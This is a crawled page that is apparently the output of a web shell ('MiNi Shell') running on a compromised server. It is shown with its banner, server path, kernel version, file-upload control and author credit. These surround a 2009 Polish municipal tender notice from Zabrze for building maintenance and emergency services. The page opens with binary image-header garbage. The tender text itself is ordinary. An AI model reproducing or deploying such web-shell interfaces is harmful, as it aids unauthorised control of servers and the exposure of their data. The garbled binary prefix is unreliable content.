JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090109/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090109/9221-N-2009.html

<p class="kh_header"><b>Zabrze: Konserwacja i pogotowie awaryjne dotyczące nieruchomości Gminy Zabrze</b><br>
<b>Numer ogłoszenia: 9221 - 2009; data zamieszczenia: 09.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Obsługi Finansowej Gospodarki Nieruchomościami , ul. Targowa 2, 41-800 Zabrze, woj. śląskie, tel. 032 3734810, faks 032 3734821.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jofgn.zabrze.magistrat.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja i pogotowie awaryjne dotyczące nieruchomości Gminy Zabrze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie czynności w zakresie robót konserwacyjnych oraz utrzymania pogotowia awaryjnego w budynkach oraz lokalach stanowiących własność Gminy Zabrze lub będących w innym posiadaniu prawnym Gminy Miejskiej Zabrze. 

Obszar w/w czynności dzieli się na 5 części wg poniższych punktów:
Część nr 1 -  Konserwacja i pogotowie awaryjne dotyczące nieruchomości Gminy Zabrze - 
POM 1 - 71 635,26  m2 - ul. 3 Maja
Część nr 2 - Konserwacja i pogotowie awaryjne dotyczące nieruchomości Gminy Zabrze - 
POM 2 - 52 927,34 m2 - ul. Żółkiewskiego
Część nr 3 - Konserwacja i pogotowie awaryjne dotyczące nieruchomości Gminy Zabrze - 
POM 3 - 72 351,40  m2 - ul. Staromiejska
Część nr 4 - Konserwacja i pogotowie awaryjne dotyczące nieruchomości Gminy Zabrze - 
POM 4 - 41 445,69 m2 - ul. Tarnopolska
Część nr 5 - Konserwacja i pogotowie awaryjne dotyczące nieruchomości Gminy Zabrze - 
POM 5 - 19 751,07 m2 - ul. Wajzera; POM 6 - 8 411,17 m2  - ul.Kruczkowskiego (razem - 28 162,24 m2)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.70.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium w wysokości: 
- Część nr 1 - 6 000,00 PLN, (słownie: sześć tysięcy 00/100 groszy),
- Część nr 2 - 4 600,00 PLN, (słownie: cztery tysiące sześćset złotych 00/100 groszy),
- Część nr 3 - 6 300,00 PLN, (słownie: sześć tysięcy trzysta złotych 00/100 groszy),
- Część nr 4 - 3 500,00 PLN, (słownie: trzy tysiące pięćset złotych 00/100 groszy),
- Część nr 5 - 2 400,00 PLN, (słownie: dwa tysiące czterysta złotych 00/100 groszy).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy:
- Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
- Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia
- Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
- Nie podlegają wykluczeniu z postępowania na podstawie art. 24 prawa zamówień publicznych
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, stosuje się do przepisów §2 Rozporządzenia Prezesa Rady Ministrów z dnia 24.05.2006 r. 
w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form , w jakich te dokumenty mogą być składane (Dz. U. Nr 87 poz. 605).
Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu stwierdzeniem: spełnia lub nie spełnia, w oparciu o wymagane dokumenty i zawarte w nich informacje.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą dostarczyć dokumenty, potwierdzające,  że łącznie spełniają warunki  udziału w postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, iż Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Pzp:
A) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 m-cy przed upływem terminu składania ofert;
B) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne i społeczne lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,  wystawione nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert,
C) aktualną informację z Krajowego Rejestru Karnego, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert potwierdzającą, że osób fizycznych, wspólników spółek jawnych, partnerów lub członków zarządu spółek partnerskich, komplementariuszy spółek komandytowych oraz spółek komandytowo-akcyjnych, urzędujących członków organu zarządzającego osób prawnych - będących Wykonawcą, nie skazano prawomocnie za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo, popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
D) aktualną informację Krajowego Rejestru Karnego, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, potwierdzającą, że podmioty zbiorowe - będące Wykonawcą, nie są podmiotami, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary;
W celu potwierdzenia, iż Wykonawca posiada niezbędną wiedzę i doświadczenie 
oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia:
A) wykaz nie mniej niż 3 wykonanych usług , a w przypadku świadczeń okresowych 
lub ciągłych również wykonywanych, o łącznej wartości 50 000,00 PLN w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania  i odbiorców oraz dokumenty, potwierdzające, że usługi te zostały wykonane należycie;
B) Wykaz co najmniej 3 osób posiadających odpowiednie kwalifikacje lub uprawnienia w zależności od wykonywanych prac w tym: 
- 1 osoba posiadająca uprawnienia elektryczne do 1kV kategorii D i E,
- 1 osoba posiadająca uprawnienia w zakresie urządzeń i instalacji gazowych kat. D i E
- 1 osoba posiadająca minimum wykształcenie średnie techniczne (tytuł technika) w zakresie budownictwa.
W celu potwierdzenia, iż Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
A) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, nie mniejszą niż 50 000,00 PLN wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
B) polisę, a w przypadku jej braku inny dokument - aktualny na dzień składania ofert - potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę ubezpieczenia nie mniejszą niż 50 000,00PLN..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.jofgn.zabrze.madistrat.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Obsługi Finansowej Gospodarki Nieruchomościami
ul. Targowa 2, 
41 - 800 Zabrze
pokój nr 20.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.01.2009 godzina 08:00, miejsce: Jednostka Obsługi Finansowej Gospodarki Nieruchomościami
ul. Targowa 2, 
41 - 800 Zabrze
pokój nr 14 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Konserwacja i pogotowie awaryjne dotyczące nieruchomości Gminy Zabrze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie czynności w zakresie robót konserwacyjnych oraz utrzymania pogotowia awaryjnego w budynkach oraz lokalach stanowiących własność Gminy Zabrze lub będących w innym posiadaniu prawnym Gminy Miejskiej Zabrze. 
Część nr 1 -  Konserwacja i pogotowie awaryjne dotyczące nieruchomości Gminy Zabrze - 
POM 1 - 71 635,26  m2 - ul. 3 Maja.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.70.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Konserwacja i pogotowie awaryjne dotyczące nieruchomości Gminy Zabrze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie czynności w zakresie robót konserwacyjnych oraz utrzymania pogotowia awaryjnego w budynkach oraz lokalach stanowiących własność Gminy Zabrze lub będących w innym posiadaniu prawnym Gminy Miejskiej Zabrze. 
Część nr 2 - Konserwacja i pogotowie awaryjne dotyczące nieruchomości Gminy Zabrze - 
POM 2 - 52 927,34 m2 - ul. Żółkiewskiego.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.70.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Konserwacja i pogotowie awaryjne dotyczące nieruchomości Gminy Zabrze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie czynności w zakresie robót konserwacyjnych oraz utrzymania pogotowia awaryjnego w budynkach oraz lokalach stanowiących własność Gminy Zabrze lub będących w innym posiadaniu prawnym Gminy Miejskiej Zabrze. 
Część nr 3 - Konserwacja i pogotowie awaryjne dotyczące nieruchomości Gminy Zabrze - 
POM 3 - 72 351,40  m2 - ul. Staromiejska.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.70.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Konserwacja i pogotowie awaryjne dotyczące nieruchomości Gminy Zabrze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie czynności w zakresie robót konserwacyjnych oraz utrzymania pogotowia awaryjnego w budynkach oraz lokalach stanowiących własność Gminy Zabrze lub będących w innym posiadaniu prawnym Gminy Miejskiej Zabrze. 
Część nr 4 - Konserwacja i pogotowie awaryjne dotyczące nieruchomości Gminy Zabrze - 
POM 4 - 41 445,69 m2 - ul. Tarnopolska.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.70.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Konserwacja i pogotowie awaryjne dotyczące nieruchomości Gminy Zabrze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie czynności w zakresie robót konserwacyjnych oraz utrzymania pogotowia awaryjnego w budynkach oraz lokalach stanowiących własność Gminy Zabrze lub będących w innym posiadaniu prawnym Gminy Miejskiej Zabrze. 
Część nr 5 - Konserwacja i pogotowie awaryjne dotyczące nieruchomości Gminy Zabrze - 
POM 5 - 19 751,07 m2 - ul. Wajzera; POM 6 - 8 411,17 m2  - ul.Kruczkowskiego (razem - 28 162,24 m2).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.70.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com